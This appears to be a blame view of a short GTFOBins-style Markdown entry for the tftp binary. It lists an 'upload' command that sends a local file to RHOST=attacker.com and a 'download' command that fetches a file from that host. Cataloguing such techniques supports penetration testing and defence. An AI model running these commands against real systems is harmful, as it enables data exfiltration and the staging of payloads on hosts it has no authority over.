16 lines
324 B
Markdown
Raw Normal View History

2018-05-21 20:14:41 +01:00
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
2018-05-24 20:59:21 +01:00
RHOST=attacker.com
2018-05-21 20:14:41 +01:00
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
2018-05-24 20:59:21 +01:00
RHOST=attacker.com
2018-05-21 20:14:41 +01:00
tftp $RHOST
get file_to_get
2018-05-25 01:10:39 +02:00
---